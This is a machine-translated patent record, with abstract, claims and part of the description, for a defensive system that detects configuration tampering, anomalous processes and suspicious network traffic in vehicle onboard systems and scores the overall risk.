CN-121547771-B - Safety detection and risk assessment system for vehicle-mounted system

Abstract

The invention discloses a vehicle-mounted system safety detection and risk assessment system, which belongs to the technical field of vehicle-mounted network safety and comprises a vehicle-mounted terminal environment sensing module, a vehicle-mounted process and control task analysis module, a communication anomaly detection and coding identification module and a safety assessment and risk feedback module, wherein the vehicle-mounted terminal environment sensing module is used for acquiring multi-level environment information of a vehicle-mounted system, the multi-level environment information comprises system layer information, network layer information and safety layer information, the vehicle-mounted profile and communication white list detection module is connected to the vehicle-mounted terminal environment sensing module and used for establishing and maintaining a safety white list library according to the acquired system information and comparing the current profile, dynamic library, port and certificate state of the system with the safety white list library through periodic scanning so as to detect configuration anomaly and file tampering events. The invention can realize the omnibearing monitoring and intelligent analysis of the configuration of the vehicle-mounted system, the process behavior and the network communication, and effectively identify hidden backdoors, abnormal processes and malicious communication.

Inventors

• CHEN HUI
• HUANG HAIJIAO
• HE PENG
• LUO YIMING
• WU HAILIANG

Assignees

• 湖北大学

Dates

Publication Date

20260508

Application Date

20260121

Claims (9)

1. 1. A vehicle-mounted system security detection and risk assessment system, comprising: the vehicle-mounted terminal environment sensing module is used for collecting multi-level environment information of a vehicle-mounted system, and comprises system layer information, network layer information and security layer information; The vehicle-mounted configuration file and communication white list detection module is connected to the vehicle-mounted terminal environment sensing module and is used for establishing and maintaining a safety white list base according to collected system information, and comparing the current configuration file, a dynamic base, a port and certificate state of the system with the safety white list base through periodic scanning so as to detect configuration abnormality and file tampering events; the vehicle-mounted process and control task analysis module is connected to the vehicle-mounted terminal environment sensing module and is used for monitoring a system process in real time, establishing a process behavior portrait based on collected process information, and detecting a hidden process, an unauthorized process and an abnormal behavior event by comparing deviation of current process behavior characteristics and normal behavior portraits established based on historical data; The communication anomaly detection and coding recognition module is connected to the vehicle-mounted terminal environment perception module and used for capturing and analyzing network traffic, detecting high entropy traffic, fake commands and anomaly communication by carrying out coding recognition, entropy analysis and semantic analysis on load content, wherein the semantic analysis process of the communication anomaly detection and coding recognition module is realized by a multi-mode reasoning model, and the model comprises a coding module, a prediction module and a multi-mode feature module, wherein the coding module is used for carrying out text coding on a text of the traffic content and a predefined semantic label set comprising normal clear text communication, coding/compression data, encryption traffic and anomaly instructions, and carrying out graph coding on a knowledge sub-graph comprising at least one communication rule of a port, a direction and a security level; the safety evaluation and risk feedback module is respectively connected to the vehicle-mounted configuration file and communication white list detection module, the vehicle-mounted process and control task analysis module and the communication abnormality detection and coding identification module, and is used for carrying out data fusion and weight evaluation on abnormal events output by the modules, calculating comprehensive risk scores, and executing corresponding risk response strategies according to the score grades.
2. 2. The system for detecting and evaluating the safety of an on-vehicle system according to claim 1, wherein the multi-level acquisition structure of the on-vehicle terminal environment sensing module comprises: the system layer acquisition unit is used for identifying the type of an operating system, the kernel version, the process snapshot and the file system meta-information by reading a system file or command output; the network layer acquisition unit is used for collecting physical and virtual network interface information, IP/MAC addresses, port monitoring states and interface security configuration of the vehicle-mounted equipment; The security layer acquisition unit is used for collecting system certificates and signature information, security policy states, user rights and audit logs.
3. 3. The system for detecting and evaluating the security of an on-vehicle system according to claim 2, wherein the detection period of the periodic scanning performed by the on-vehicle configuration file and communication whitelist detection module is 10 minutes, and the detection objects include file hash values under a key directory, dynamic library paths loaded by processes, system monitoring ports, and validity and signature of digital certificates.
4. 4. The system for detecting and evaluating the safety of an on-board system according to claim 3, wherein the process of establishing the process behavior portraits by the on-board process and the control task analyzing module comprises the steps of collecting the PID, the process name, the running path, the resource occupancy rate, the user authority, the father-son relationship and the communication direction information of the process and packaging the multidimensional features into a behavior vector, and the abnormal behavior event comprises the steps that the process executing path is deleted and still running, the non-system user starts the system task, and the process frequently accesses an unknown IP or high-risk port and marks the unknown IP or high-risk port as a potential command executing event.
5. 5. The system for security detection and risk assessment of an on-board system according to claim 4, wherein the content parsing and encoding identification process of the communication anomaly detection and encoding identification module supports recursive decoding of at least one encoding or compression format selected from the group consisting of Base64, hex, URL encoding, gzip, zlib, and marking as suspicious when a predetermined illegal character combination occurs in the decoded content.
6. 6. The system for detecting and evaluating the safety of an on-vehicle system according to claim 5, wherein the entropy analysis process of the communication anomaly detection and encoding identification module comprises calculating shannon entropy of the decoded data block, and calculating anomaly scores according to an entropy range, printable character proportions and character set compatibility characteristics by a preset weight formula, wherein the data block with an entropy value greater than 4.5 is determined as high entropy data.
7. 7. The system for detecting and evaluating the safety of a vehicle-mounted system according to claim 6, wherein in the weight evaluation of the safety evaluation and risk feedback module, the calculation formula of the comprehensive risk Score is score=0.3×communication anomaly score+0.25×configuration anomaly score+0.25×process anomaly score+0.1×system risk score+0.1×ai confidence Score, and the result is normalized to a 0-1 interval.
8. 8. The vehicle-mounted system security detection and risk assessment system according to claim 7, wherein the security assessment and risk feedback module performs a hierarchical response strategy according to the composite risk score comprising: when the score is in a high risk interval of 0.7-1.0, immediately cutting off an external communication interface and freezing a suspicious process; When the score is in the middle risk interval of 0.4-0.7, recording an event log and uploading the event log to a cloud security center; and when the score is in the low risk interval of 0.0-0.4, carrying out local recording and taking the local recording as a learning sample of the optimized risk model.
9. 9. The system for detecting and evaluating the safety of an on-vehicle system according to claim 8, wherein the detection report and all the response operations output by the safety evaluation and risk feedback module record an audit log, and the audit log is accompanied by a time stamp and a signature hash.

Description

Safety detection and risk assessment system for vehicle-mounted system Technical Field The invention relates to the technical field of vehicle-mounted network safety, in particular to a vehicle-mounted system safety detection and risk assessment system. Background With the rapid development of intelligent networking automobiles, vehicles have evolved into complex "mobile computing terminals" that integrate multiple computing units, infotainment systems, V2X communication modules, and cloud service interfaces. The environment of the Internet of vehicles makes attack surfaces increasingly dispersed and equipment isomerism is aggravated. In order to facilitate the function expansion, the vehicle-mounted system widely adopts a dynamic loading mechanism, but simultaneously provides a multiplicative machine for an attacker to disguise the back door. In addition, as the number of vehicle-mounted software increases, users may inadvertently install pseudo-trusted software tampered with or implanted with rootkits, resulting in strong rear door concealment and long latency, which is difficult to effectively cope with by traditional detection methods based on feature codes or fixed rules. The existing vehicle-mounted security scheme focuses on single-level protection, such as network firewall, intrusion Detection System (IDS) or simple file integrity verification, and lacks comprehensive capability of collaborative analysis and multi-mode reasoning on system configuration, process behavior and network traffic. Therefore, there is an urgent need for a vehicle-mounted system security detection scheme that can deeply fuse the static configuration, the dynamic operation state and the network communication content of the system, and can perform abnormal reasoning through an intelligent model. To this end, a person skilled in the art provides a vehicle-mounted system security detection and risk assessment system to solve the above-mentioned problems in the background art. Disclosure of Invention The invention aims to provide a vehicle-mounted system safety detection and risk assessment system which can realize omnibearing monitoring and intelligent analysis on vehicle-mounted system configuration, process behaviors and network communication, and effectively identify hidden backdoors, abnormal processes and malicious communication so as to solve the problems in the background technology. In order to achieve the above purpose, the present invention provides the following technical solutions: An in-vehicle system security detection and risk assessment system, comprising: the vehicle-mounted terminal environment sensing module is used for collecting multi-level environment information of a vehicle-mounted system, and comprises system layer information, network layer information and security layer information; The vehicle-mounted configuration file and communication white list detection module is connected to the vehicle-mounted terminal environment sensing module and is used for establishing and maintaining a safety white list base according to collected system information, and comparing the current configuration file, a dynamic base, a port and certificate state of the system with the safety white list base through periodic scanning so as to detect configuration abnormality and file tampering events; the vehicle-mounted process and control task analysis module is connected to the vehicle-mounted terminal environment sensing module and is used for monitoring a system process in real time, establishing a process behavior portrait based on collected process information, and detecting a hidden process, an unauthorized process and an abnormal behavior event by comparing deviation of current process behavior characteristics and normal behavior portraits established based on historical data; the communication anomaly detection and code recognition module is connected to the vehicle-mounted terminal environment sensing module and is used for capturing and analyzing network flow, and high-entropy flow, fake command and anomaly communication are detected by carrying out code recognition, entropy analysis and semantic analysis on load content; the safety evaluation and risk feedback module is respectively connected to the vehicle-mounted configuration file and communication white list detection module, the vehicle-mounted process and control task analysis module and the communication abnormality detection and coding identification module, and is used for carrying out data fusion and weight evaluation on abnormal events output by the modules, calculating comprehensive risk scores, and executing corresponding risk response strategies according to the score grades. As a further scheme of the invention, the multi-level acquisition structure of the vehicle-mounted terminal environment sensing module comprises the following components: the system layer acquisition unit is used for identifying the type of an operating system, the kernel version,